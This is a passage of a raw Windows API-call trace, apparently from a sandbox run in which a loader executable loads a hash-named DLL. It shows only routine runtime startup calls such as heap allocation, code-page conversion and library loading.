returned 0x590000 [0098.105] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.105] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0098.105] GetLastError () returned 0x7e [0098.105] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0098.105] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0098.105] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c8) returned 0x59c2c0 [0098.106] SetLastError (dwErrCode=0x7e) [0098.106] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1200) returned 0x5a3450 [0098.108] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0098.108] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0098.108] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0098.108] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0098.108] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW" [0098.108] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW" [0098.108] GetACP () returned 0x4e4 [0098.109] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x228) returned 0x594ef0 [0098.109] IsValidCodePage (CodePage=0x4e4) returned 1 [0098.109] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0098.109] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0098.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0098.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0098.109] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0098.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0098.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0098.109] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.109] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0098.109] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0098.109] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0098.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0098.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0098.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0098.109] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0098.109] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0098.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x100) returned 0x5a18d0 [0098.110] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x160) returned 0x599a40 [0098.110] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0098.110] GetLastError () returned 0x0 [0098.110] SetLastError (dwErrCode=0x0) [0098.110] GetEnvironmentStringsW () returned 0x5a4660* [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9cc) returned 0x5a5040 [0098.110] FreeEnvironmentStringsW (penv=0x5a4660) returned 1 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x118) returned 0x599e70 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3e) returned 0x5a0c00 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x5c) returned 0x5907b0 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x594770 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x78) returned 0x59c690 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x5955b0 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x59b200 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5a0840 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x59b380 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3a) returned 0x5a0110 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x62) returned 0x5944e0 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2a) returned 0x59c710 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5947e0 [0098.110] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x59b3b0 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd2) returned 0x595840 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x7c) returned 0x593fd0 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3a) returned 0x5a0ca0 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x90) returned 0x593c00 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x59b560 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x594550 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x36) returned 0x595620 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x59ff80 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x52) returned 0x5992c0 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a03e0 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd6) returned 0x595180 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5920c0 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1e) returned 0x59b7a0 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x592100 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x599380 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x52) returned 0x599320 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x59b6e0 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x42) returned 0x5a0b10 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2c) returned 0x592140 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5a0700 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x24) returned 0x59b890 [0098.111] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5040 | out: hHeap=0x590000) returned 1 [0098.111] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1000) returned 0x5a4660 [0098.111] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0098.111] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0098.112] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW" [0098.112] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x599710*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0098.112] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0098.115] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.116] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0098.116] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.116] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0098.116] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0098.117] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.117] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0098.118] GetProcessHeap () returned 0x590000 [0098.118] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0098.118] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0098.118] GetLastError () returned 0x0 [0098.118] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0098.118] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0098.118] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c8) returned 0x5a5af0 [0098.118] SetLastError (dwErrCode=0x0) [0098.118] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1200) returned 0x5a5ec0 [0098.120] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0098.120] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0098.120] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0098.120] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0098.120] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW" [0098.121] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW" [0098.121] GetACP () returned 0x4e4 [0098.121] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x228) returned 0x59ac40 [0098.121] IsValidCodePage (CodePage=0x4e4) returned 1 [0098.121] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0098.121] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0098.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0098.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 